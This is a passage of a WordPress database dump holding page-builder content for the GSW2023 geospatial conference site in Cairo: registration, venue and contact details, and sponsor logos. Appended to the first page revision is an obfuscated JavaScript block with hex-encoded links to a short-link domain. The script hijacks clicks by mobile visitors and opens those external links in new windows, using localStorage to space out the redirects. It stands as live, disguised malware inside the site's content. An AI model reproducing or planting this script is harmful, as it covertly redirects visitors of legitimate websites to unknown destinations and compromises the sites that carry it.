css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377455929{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\"><strong>As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-18 02:38:14','2023-05-18 02:38:14','',3066,'https://gsw2023.com/?p=4549',0,'revision','',0),
(4550,1,'2023-05-18 02:38:21','2023-05-18 02:38:21','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305146113{margin-top: 0px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" 